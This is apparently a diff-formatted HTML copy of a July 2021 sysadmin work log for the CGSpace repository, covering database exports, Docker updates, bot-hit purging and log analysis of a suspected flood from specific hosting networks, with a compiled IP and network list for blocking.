+localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+COPY 20994
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "July, 2021",
+  "url": "https://alanorth.github.io/cgspace-notes/2021-07/",
+  "wordCount": "3471",
+  "datePublished": "2021-07-01T08:53:07+03:00",
+  "dateModified": "2021-08-01T16:19:05+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2021-07/">
+
+    <title>July, 2021 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-07/">July, 2021</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2021-07-01T08:53:07+03:00">Thu Jul 01, 2021</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-07-01">2021-07-01</h2>
+<ul>
+<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 20994
+</span></span></code></pre></div><h2 id="2021-07-04">2021-07-04</h2>
+<ul>
+<li>Update all Docker containers on the AReS server (linode20) and rebuild OpenRXV:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cd OpenRXV
+</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml down
+</span></span><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
+</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml build
+</span></span></code></pre></div><ul>
+<li>Then run all system updates and reboot the server</li>
+<li>After the server came back up I cloned the <code>openrxv-items-final</code> index to <code>openrxv-items-temp</code> and started the plugins
+<ul>
+<li>This will hopefully be faster than a full re-harvest&hellip;</li>
+</ul>
+</li>
+<li>I opened a few GitHub issues for OpenRXV bugs:
+<ul>
+<li><a href="https://github.com/ilri/OpenRXV/issues/103">Hide &ldquo;metadata structure&rdquo; section in repository setup</a></li>
+<li><a href="https://github.com/ilri/OpenRXV/issues/104">Improve &ldquo;start plugins&rdquo; and &ldquo;commit indexing&rdquo; buttons</a></li>
+<li><a href="https://github.com/ilri/OpenRXV/issues/105">Allow running plugins individually</a></li>
+<li><a href="https://github.com/ilri/OpenRXV/issues/106">Hide the &ldquo;DSpace add missing items&rdquo;</a></li>
+</ul>
+</li>
+<li>Rebuild DSpace Test (linode26) from a fresh Ubuntu 20.04 image on Linode</li>
+<li>The start plugins on AReS had seventy-five errors from the <code>dspace_add_missing_items</code> plugin for some reason so I had to start a fresh indexing</li>
+<li>I noticed that the WorldFish data has dozens of incorrect countries so I should talk to Salem about that because they manage it
+<ul>
+<li>Also I noticed that we weren&rsquo;t using the Country formatter in OpenRXV for the WorldFish country field, so some values don&rsquo;t get mapped properly</li>
+<li>I added some value mappings to fix some issues with WorldFish data and added a few more fields to the repository harvesting config and started a fresh re-indexing</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-07-05">2021-07-05</h2>
+<ul>
+<li>The AReS harvesting last night succeeded and I started the plugins</li>
+<li>Margarita from CCAFS asked if we can create a new field for AICCRA publications
+<ul>
+<li>I asked her to clarify what they want</li>
+<li>AICCRA is an initiative so it might be better to create new field for that, for example <code>cg.contributor.initiative</code></li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-07-06">2021-07-06</h2>
+<ul>
+<li>Atmire merged my spider user agent changes from last month so I will update the <code>example</code> list we use in DSpace and remove the new ones from my <code>ilri</code> override file
+<ul>
+<li>Also, I concatenated all our user agents into one file and purged all hits:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/spiders -p
+</span></span><span style="display:flex;"><span>Purging 95 hits from Drupal in statistics
+</span></span><span style="display:flex;"><span>Purging 38 hits from DTS Agent in statistics
+</span></span><span style="display:flex;"><span>Purging 601 hits from Microsoft Office Existence Discovery in statistics
+</span></span><span style="display:flex;"><span>Purging 51 hits from Site24x7 in statistics
+</span></span><span style="display:flex;"><span>Purging 62 hits from Trello in statistics
+</span></span><span style="display:flex;"><span>Purging 13574 hits from WhatsApp in statistics
+</span></span><span style="display:flex;"><span>Purging 144 hits from FlipboardProxy in statistics
+</span></span><span style="display:flex;"><span>Purging 37 hits from LinkWalker in statistics
+</span></span><span style="display:flex;"><span>Purging 1 hits from [Ll]ink.?[Cc]heck.? in statistics
+</span></span><span style="display:flex;"><span>Purging 427 hits from WordPress in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 15030
+</span></span></code></pre></div><ul>
+<li>Meet with the CGIAR–AGROVOC task group to discuss how we want to do the workflow for submitting new terms to AGROVOC</li>
+<li>I extracted another list of all subjects to check against AGROVOC:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>\COPY (SELECT DISTINCT(LOWER(text_value)) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-06-all-subjects.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-07-06-all-subjects.csv | sed 1d &gt; /tmp/2021-07-06-all-subjects.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-06-agrovoc-results-all-subjects.csv -d
+</span></span></code></pre></div><ul>
+<li>Test <a href="https://github.com/DSpace/DSpace/pull/3162">Hrafn Malmquist&rsquo;s proposed DBCP2 changes</a> for DSpace 6.4 (DS-4574)
+<ul>
+<li>His changes reminded me that we can perhaps switch back to using this pooling instead of Tomcat 7&rsquo;s JDBC pooling via JNDI</li>
+<li>Tomcat 8 has DBCP2 built in, but we are stuck on Tomcat 7 for now</li>
+</ul>
+</li>
+<li>Looking into the database issues we had last month on 2021-06-23
+<ul>
+<li>I think it might have been some kind of attack because the number of XMLUI sessions was through the roof at one point (10,000!) and the number of unique IPs accessing the server that day is much higher than any other day:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># <span style="color:#66d9ef">for</span> num in <span style="color:#f92672">{</span>10..26<span style="color:#f92672">}</span>; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;2021-06-</span>$num<span style="color:#e6db74">&#34;</span>; zcat /var/log/nginx/access.log.*.gz /var/log/nginx/library-access.log.*.gz | grep <span style="color:#e6db74">&#34;</span>$num<span style="color:#e6db74">/Jun/2021&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>2021-06-10
+</span></span><span style="display:flex;"><span>10693
+</span></span><span style="display:flex;"><span>2021-06-11
+</span></span><span style="display:flex;"><span>10587
+</span></span><span style="display:flex;"><span>2021-06-12
+</span></span><span style="display:flex;"><span>7958
+</span></span><span style="display:flex;"><span>2021-06-13
+</span></span><span style="display:flex;"><span>7681
+</span></span><span style="display:flex;"><span>2021-06-14
+</span></span><span style="display:flex;"><span>12639
+</span></span><span style="display:flex;"><span>2021-06-15
+</span></span><span style="display:flex;"><span>15388
+</span></span><span style="display:flex;"><span>2021-06-16
+</span></span><span style="display:flex;"><span>12245
+</span></span><span style="display:flex;"><span>2021-06-17
+</span></span><span style="display:flex;"><span>11187
+</span></span><span style="display:flex;"><span>2021-06-18
+</span></span><span style="display:flex;"><span>9684
+</span></span><span style="display:flex;"><span>2021-06-19
+</span></span><span style="display:flex;"><span>7835
+</span></span><span style="display:flex;"><span>2021-06-20
+</span></span><span style="display:flex;"><span>7198
+</span></span><span style="display:flex;"><span>2021-06-21
+</span></span><span style="display:flex;"><span>10380
+</span></span><span style="display:flex;"><span>2021-06-22
+</span></span><span style="display:flex;"><span>10255
+</span></span><span style="display:flex;"><span>2021-06-23
+</span></span><span style="display:flex;"><span>15878
+</span></span><span style="display:flex;"><span>2021-06-24
+</span></span><span style="display:flex;"><span>9963
+</span></span><span style="display:flex;"><span>2021-06-25
+</span></span><span style="display:flex;"><span>9439
+</span></span><span style="display:flex;"><span>2021-06-26
+</span></span><span style="display:flex;"><span>7930
+</span></span></code></pre></div><ul>
+<li>Similarly, the number of connections to the REST API was around the average for the recent weeks before:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># <span style="color:#66d9ef">for</span> num in <span style="color:#f92672">{</span>10..26<span style="color:#f92672">}</span>; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;2021-06-</span>$num<span style="color:#e6db74">&#34;</span>; zcat /var/log/nginx/rest.*.gz | grep <span style="color:#e6db74">&#34;</span>$num<span style="color:#e6db74">/Jun/2021&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>2021-06-10
+</span></span><span style="display:flex;"><span>1183
+</span></span><span style="display:flex;"><span>2021-06-11
+</span></span><span style="display:flex;"><span>1074
+</span></span><span style="display:flex;"><span>2021-06-12
+</span></span><span style="display:flex;"><span>911
+</span></span><span style="display:flex;"><span>2021-06-13
+</span></span><span style="display:flex;"><span>892
+</span></span><span style="display:flex;"><span>2021-06-14
+</span></span><span style="display:flex;"><span>1320
+</span></span><span style="display:flex;"><span>2021-06-15
+</span></span><span style="display:flex;"><span>1257
+</span></span><span style="display:flex;"><span>2021-06-16
+</span></span><span style="display:flex;"><span>1208
+</span></span><span style="display:flex;"><span>2021-06-17
+</span></span><span style="display:flex;"><span>1119
+</span></span><span style="display:flex;"><span>2021-06-18
+</span></span><span style="display:flex;"><span>965
+</span></span><span style="display:flex;"><span>2021-06-19
+</span></span><span style="display:flex;"><span>985
+</span></span><span style="display:flex;"><span>2021-06-20
+</span></span><span style="display:flex;"><span>854
+</span></span><span style="display:flex;"><span>2021-06-21
+</span></span><span style="display:flex;"><span>1098
+</span></span><span style="display:flex;"><span>2021-06-22
+</span></span><span style="display:flex;"><span>1028
+</span></span><span style="display:flex;"><span>2021-06-23
+</span></span><span style="display:flex;"><span>1375
+</span></span><span style="display:flex;"><span>2021-06-24
+</span></span><span style="display:flex;"><span>1135
+</span></span><span style="display:flex;"><span>2021-06-25
+</span></span><span style="display:flex;"><span>969
+</span></span><span style="display:flex;"><span>2021-06-26
+</span></span><span style="display:flex;"><span>904
+</span></span></code></pre></div><ul>
+<li>According to goaccess, the traffic spike started at 2AM (remember that the first &ldquo;Pool empty&rdquo; error in dspace.log was at 4:01AM):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat /var/log/nginx/access.log.1<span style="color:#f92672">[</span>45<span style="color:#f92672">]</span>.gz /var/log/nginx/library-access.log.1<span style="color:#f92672">[</span>45<span style="color:#f92672">]</span>.gz | grep -E <span style="color:#e6db74">&#39;23/Jun/2021&#39;</span> | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
+</span></span></code></pre></div><ul>
+<li>Moayad sent a fix for the add missing items plugins issue (<a href="https://github.com/ilri/OpenRXV/pull/107">#107</a>)
+<ul>
+<li>It works MUCH faster because it correctly identifies the missing handles in each repository</li>
+<li>Also it adds better debug messages to the api logs</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-07-08">2021-07-08</h2>
+<ul>
+<li>Atmire plans to debug the database connection issues on CGSpace (linode18) today so they asked me to make the REST API inaccessible for today and tomorrow
+<ul>
+<li>I adjusted nginx to give an HTTP 403 as well as a an error message to contact me</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-07-11">2021-07-11</h2>
+<ul>
+<li>Start an indexing on AReS</li>
+</ul>
+<h2 id="2021-07-17">2021-07-17</h2>
+<ul>
+<li>I&rsquo;m in Cyprus mostly offline, but I noticed that CGSpace was down
+<ul>
+<li>I checked and there was a blank white page with HTTP 200</li>
+<li>There are thousands of locks in PostgreSQL:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
+</span></span><span style="display:flex;"><span>2302
+</span></span><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
+</span></span><span style="display:flex;"><span>2564
+</span></span><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
+</span></span><span style="display:flex;"><span>2530
+</span></span></code></pre></div><ul>
+<li>The locks are held by XMLUI, not REST API or OAI:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi)&#39; | sort | uniq -c | sort -n
+</span></span><span style="display:flex;"><span>     57 dspaceApi
+</span></span><span style="display:flex;"><span>   2671 dspaceWeb
+</span></span></code></pre></div><ul>
+<li>I ran all updates on the server (linode18) and restarted it, then DSpace came back up</li>
+<li>I sent a message to Atmire, as I never heard from them last week when we blocked access to the REST API for two days for them to investigate the server issues</li>
+<li>Clone the <code>openrxv-items-temp</code> index on AReS and re-run all the plugins, but most of the &ldquo;dspace_add_missing_items&rdquo; tasks failed so I will just run a full re-harvest</li>
+<li>The load on CGSpace is 45.00&hellip; the nginx access.log is going so fast I can&rsquo;t even read it
+<ul>
+<li>I see lots of IPs from AS206485 that are changing their user agents (Linux, Windows, macOS&hellip;)</li>
+<li>This is finegroupservers.com aka &ldquo;UGB - UGB Hosting OU&rdquo;</li>
+<li>I will get a list of their IP blocks from <a href="https://asn.ipinfo.app/AS206485">ipinfo.app</a> and block them in nginx</li>
+<li>There is another group of IPs that are owned by an ISP called &ldquo;TrafficTransitSolution LLC&rdquo; that does not have its own ASN unfortunately</li>
+<li>&ldquo;TrafficTransitSolution LLC&rdquo; seems to be affiliated with AS206485 (UGB Hosting OU) anyways, but they sometimes use AS49453 Global Layer B.V.G also</li>
+<li>I found a tool that lets you grep a file by CIDR, so I can use that to purge hits from Solr eventually:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grepcidr 91.243.191.0/24 /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -n
+</span></span><span style="display:flex;"><span>     32 91.243.191.124
+</span></span><span style="display:flex;"><span>     33 91.243.191.129
+</span></span><span style="display:flex;"><span>     33 91.243.191.200
+</span></span><span style="display:flex;"><span>     34 91.243.191.115
+</span></span><span style="display:flex;"><span>     34 91.243.191.154
+</span></span><span style="display:flex;"><span>     34 91.243.191.234
+</span></span><span style="display:flex;"><span>     34 91.243.191.56
+</span></span><span style="display:flex;"><span>     35 91.243.191.187
+</span></span><span style="display:flex;"><span>     35 91.243.191.91
+</span></span><span style="display:flex;"><span>     36 91.243.191.58
+</span></span><span style="display:flex;"><span>     37 91.243.191.209
+</span></span><span style="display:flex;"><span>     39 91.243.191.119
+</span></span><span style="display:flex;"><span>     39 91.243.191.144
+</span></span><span style="display:flex;"><span>     39 91.243.191.55
+</span></span><span style="display:flex;"><span>     40 91.243.191.112
+</span></span><span style="display:flex;"><span>     40 91.243.191.182
+</span></span><span style="display:flex;"><span>     40 91.243.191.57
+</span></span><span style="display:flex;"><span>     40 91.243.191.98
+</span></span><span style="display:flex;"><span>     41 91.243.191.106
+</span></span><span style="display:flex;"><span>     44 91.243.191.79
+</span></span><span style="display:flex;"><span>     45 91.243.191.151
+</span></span><span style="display:flex;"><span>     46 91.243.191.103
+</span></span><span style="display:flex;"><span>     56 91.243.191.172
+</span></span></code></pre></div><ul>
+<li>I found a few people complaining about these Russian attacks too:
+<ul>
+<li><a href="https://community.cloudflare.com/t/russian-ddos-completley-unmitigated-by-cloudflare/284578">https://community.cloudflare.com/t/russian-ddos-completley-unmitigated-by-cloudflare/284578</a></li>
+<li><a href="https://vklader.com/ddos-2020-may/">https://vklader.com/ddos-2020-may/</a></li>
+</ul>
+</li>
+<li>According to AbuseIPDB.com and whois data provided by the asn tool, I see these organizations, networks, and ISPs all seem to be related:
+<ul>
+<li>Sharktech</li>
+<li>LIR LLC / lir.am</li>
+<li>TrafficTransitSolution LLC / traffictransitsolution.us</li>
+<li>Fine Group Servers Solutions LLC / finegroupservers.com</li>
+<li>UGB</li>
+<li>Bulgakov Alexey Yurievich</li>
+<li>Dmitry Vorozhtsov / fitz-isp.uk / UGB</li>
+<li>Auction LLC / dauction.ru / UGB / traffictransitsolution.us</li>
+<li>Alax LLC / alaxona.com / finegroupservers.com</li>
+<li>Sysoev Aleksey Anatolevich / jobbuzzactiv.com / traffictransitsolution.us</li>
+<li>Bulgakov Alexey Yurievich / UGB / blockchainnetworksolutions.co.uk / <a href="mailto:info@finegroupservers.com">info@finegroupservers.com</a></li>
+<li>UAB Rakrejus</li>
+</ul>
+</li>
+<li>I looked in the nginx log and copied a few IP addresses that were suspicious
+<ul>
+<li>First I looked them up in AbuseIPDB.com to get the ISP name and website</li>
+<li>Then I looked them up with the <a href="https://github.com/nitefood/asn">asn</a> tool, ie:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./asn -n 45.80.217.235  
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>╭──────────────────────────────╮
+</span></span><span style="display:flex;"><span>│ ASN lookup for 45.80.217.235 │
+</span></span><span style="display:flex;"><span>╰──────────────────────────────╯
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 45.80.217.235 ┌PTR -
+</span></span><span style="display:flex;"><span>               ├ASN 46844 (ST-BGP, US)
+</span></span><span style="display:flex;"><span>               ├ORG Sharktech
+</span></span><span style="display:flex;"><span>               ├NET 45.80.217.0/24 (TrafficTransitSolutionNet)
+</span></span><span style="display:flex;"><span>               ├ABU info@traffictransitsolution.us
+</span></span><span style="display:flex;"><span>               ├ROA ✓ VALID (1 ROA found)
+</span></span><span style="display:flex;"><span>               ├TYP  Proxy host   Hosting/DC 
+</span></span><span style="display:flex;"><span>               ├GEO Los Angeles, California (US)
+</span></span><span style="display:flex;"><span>               └REP ✓ NONE
+</span></span></code></pre></div><ul>
+<li>Slowly slowly I manually built up a list of the IPs, ISP names, and network blocks, for example:</li>
+</ul>
+<pre tabindex="0"><code class="language-csv" data-lang="csv">IP, Organization, Website, Network
+45.148.126.246, TrafficTransitSolution LLC, traffictransitsolution.us, 45.148.126.0/24 (Net-traffictransitsolution-15)
+45.138.102.253, TrafficTransitSolution LLC, traffictransitsolution.us, 45.138.102.0/24 (Net-traffictransitsolution-11)
+45.140.205.104, Bulgakov Alexey Yurievich, finegroupservers.com, 45.140.204.0/23 (CHINA_NETWORK)
+185.68.247.63, Fine Group Servers Solutions LLC, finegroupservers.com, 185.68.247.0/24 (Net-finegroupservers-18)
+213.232.123.188, Fine Group Servers Solutions LLC, finegroupservers.com, 213.232.123.0/24 (Net-finegroupservers-12)
+45.80.217.235, TrafficTransitSolution LLC, traffictransitsolution.us, 45.80.217.0/24 (TrafficTransitSolutionNet)
+185.81.144.202, Fine Group Servers Solutions LLC, finegroupservers.com, 185.81.144.0/24 (Net-finegroupservers-19)
+109.106.22.114, TrafficTransitSolution LLC, traffictransitsolution.us, 109.106.22.0/24 (TrafficTransitSolutionNet)
+185.68.247.200, Fine Group Servers Solutions LLC, finegroupservers.com, 185.68.247.0/24 (Net-finegroupservers-18)
+45.80.105.252, Bulgakov Alexey Yurievich, finegroupservers.com, 45.80.104.0/23 (NET-BNSL2-1)
+185.233.187.156, Dmitry Vorozhtsov, mgn-host.ru, 185.233.187.0/24 (GB-FITZISP-20181106)
+185.88.100.75, TrafficTransitSolution LLC, traffictransitsolution.us, 185.88.100.0/24 (Net-traffictransitsolution-17)
+194.104.8.154, TrafficTransitSolution LLC, traffictransitsolution.us, 194.104.8.0/24 (Net-traffictransitsolution-37)
+185.102.112.46, Fine Group Servers Solutions LLC, finegroupservers.com, 185.102.112.0/24 (Net-finegroupservers-13)
+212.193.12.64, Fine Group Servers Solutions LLC, finegroupservers.com, 212.193.12.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+91.243.191.129, Auction LLC, dauction.ru, 91.243.191.0/24 (TR-QN-20180917)
+45.148.232.161, Nikolaeva Ekaterina Sergeevna, blockchainnetworksolutions.co.uk, 45.148.232.0/23 (LONDON_NETWORK)
+147.78.181.191, TrafficTransitSolution LLC, traffictransitsolution.us, 147.78.181.0/24 (Net-traffictransitsolution-58)
+77.83.27.90, Alax LLC, alaxona.com, 77.83.27.0/24 (FINEGROUPSERVERS-LEASE)
+185.250.46.119, Dmitry Vorozhtsov, mgn-host.ru, 185.250.46.0/23 (GB-FITZISP-20181106)
+94.231.219.106, LIR LLC, lir.am, 94.231.219.0/24 (CN-NET-219)
+45.12.65.56, Sysoev Aleksey Anatolevich, jobbuzzactiv.com / traffictransitsolution.us, 45.12.65.0/24 (TrafficTransitSolutionNet)
+45.140.206.31, Bulgakov Alexey Yurievich, blockchainnetworksolutions.co.uk / info@finegroupservers.com, 45.140.206.0/23 (FRANKFURT_NETWORK)
+84.54.57.130, LIR LLC, lir.am / traffictransitsolution.us, 84.54.56.0/23 (CN-FTNET-5456)
+178.20.214.235, Alaxona Internet Inc., alaxona.com / finegroupservers.com, 178.20.214.0/24 (FINEGROUPSERVERS-LEASE)
+37.44.253.204, Atex LLC, atex.ru / blockchainnetworksolutions.co.uk, 37.44.252.0/23 (NL-FTN-44252)
+46.161.61.242, Petersburg Internet Network Ltd., pinspb.ru / abusemail@depo40.ru, 46.161.61.0/24 (FineTransitDE)
+194.87.113.141, Fine Group Servers Solutions LLC, finegroupservers.com, 194.87.113.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+109.94.223.217, LIR LLC, lir.am / traffictransitsolution.us, 109.94.223.0/24 (CN-NET-223)
+94.231.217.115, LIR LLC, lir.am / traffictransitsolution.us, 94.231.217.0/24 (TR-NET-217)
+146.185.202.214, Petersburg Internet Network Ltd., pinspb.ru / abusemail@depo40.ru / abuse@ripe.net, 146.185.202.0/24 (FineTransitRU)
+194.58.68.110, Fine Group Servers Solutions LLC, finegroupservers.com, 194.58.68.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+94.154.131.237, TrafficTransitSolution LLC, traffictransitsolution.us, 94.154.131.0/24 (TrafficTransitSolutionNet)
+193.202.8.245, Fine Group Servers Solutions LLC, finegroupservers.com, 193.202.8.0/21 (FTL5)
+212.192.27.33, Fine Group Servers Solutions LLC, finegroupservers.com, 212.192.27.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+193.202.87.218, Fine Group Servers Solutions LLC, finegroupservers.com, 193.202.84.0/22 (FTEL-2)
+146.185.200.52, Petersburg Internet Network Ltd., pinspb.ru / abusemail@depo40.ru / abuse@ripe.net, 146.185.200.0/24 (FineTransitRU)
+194.104.11.11, TrafficTransitSolution LLC, traffictransitsolution.us, 194.104.11.0/24 (Net-traffictransitsolution-40)
+185.50.250.145, ATOMOHOST LLC, atomohost.com, 185.50.250.0/24 (Silverstar_Invest_Limited)
+37.9.46.68, Petersburg Internet Network Ltd., pinspb.ru / abusemail@depo40.ru / abuse@ripe.net / , 37.9.44.0/22 (QUALITYNETWORK)
+185.81.145.14, Fine Group Servers Solutions LLC, finegroupservers.com, 185.81.145.0/24 (Net-finegroupservers-20)
+5.183.255.72, TrafficTransitSolution LLC, traffictransitsolution.us, 5.183.255.0/24 (Net-traffictransitsolution-32)
+84.54.58.204, LIR LLC, lir.am / traffictransitsolution.us, 84.54.58.0/24 (GB-BTTGROUP-20181119)
+109.236.55.175, Mosnet LLC, mosnetworks.ru / info@traffictransitsolution.us, 109.236.55.0/24 (CN-NET-55)
+5.133.123.184, Mosnet LLC, mosnet.ru / abuse@blockchainnetworksolutions.co.uk, 5.133.123.0/24 (DE-NET5133123)
+5.181.168.90, Fine Group Servers Solutions LLC, finegroupservers.com, 5.181.168.0/24 (Net-finegroupservers-5)
+185.61.217.86, TrafficTransitSolution LLC, traffictransitsolution.us, 185.61.217.0/24 (Net-traffictransitsolution-46)
+217.145.227.84, TrafficTransitSolution LLC, traffictransitsolution.us, 217.145.227.0/24 (Net-traffictransitsolution-64)
+193.56.75.29, Auction LLC, dauction.ru / abuse@blockchainnetworksolutions.co.uk, 193.56.75.0/24 (CN-NET-75)
+45.132.184.212, TrafficTransitSolution LLC, traffictransitsolution.us, 45.132.184.0/24 (Net-traffictransitsolution-5)
+45.10.167.239, TrafficTransitSolution LLC, traffictransitsolution.us, 45.10.167.0/24 (Net-traffictransitsolution-28)
+109.94.222.106, Express Courier LLC, expcourier.ru / info@traffictransitsolution.us, 109.94.222.0/24 (IN-NET-222)
